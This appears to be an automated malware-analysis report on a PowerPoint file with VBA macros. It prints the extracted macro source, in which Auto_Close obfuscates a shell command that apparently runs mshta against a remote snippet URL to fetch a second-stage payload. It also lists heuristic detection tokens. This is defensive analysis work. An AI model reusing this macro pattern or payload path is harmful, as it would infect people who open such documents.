MALICIOUS
68
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a PowerPoint file containing VBA macros. The Auto_Close macro is designed to execute a shell command. This command is constructed by concatenating strings from various objects, ultimately forming a URL that likely points to a second-stage payload. The script's intent is to download and execute this payload.
Heuristics 3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Function Auto_Close()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2140 bytes |
SHA-256: 471735d407db733fb3cecaf995d91e56dbe263637e4542ddf8a13706e5ac9b50 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "score"
Function Auto_Close()
Dim hi As New textfile
Dim Opera As New najma
Dim textfileforyou As New modern
textfilestuffonly = Opera.X + Opera.Y + textfileforyou.Z + textfileforyou.D + hi.openmarket + hi.XXX + hi.K + hi.T
MsgBox "Error!!!": Call Shell!(textfilestuffonly)
End Function
Attribute VB_Name = "textfile"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function openmarket() As String
openmarket = textfilestuff.mosuf.Tag
End Function
Function XXX() As String
XXX = textfilestuff.Tag
End Function
Function K() As String
K = textfilestuff.stuff.Tag
End Function
Function T() As String
T = "/!api/2.0/snippets/warzonepro/KME7g4/7678df565d5a8824274645a03590fc72588243f0/files/orignalfinal"
End Function
Attribute VB_Name = "najma"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function X() As String
X = "M"
End Function
Function Y() As String
Y = "s"
End Function
Attribute VB_Name = "textfilestuff"
Attribute VB_Base = "0{66F7F502-E35A-4F4A-956F-12A65DC64BC6}{98E14456-6E91-4866-889F-E1E34742E4B0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "modern"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Z() As String
Z = "H"
End Function
Function D() As String
D = "T"
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.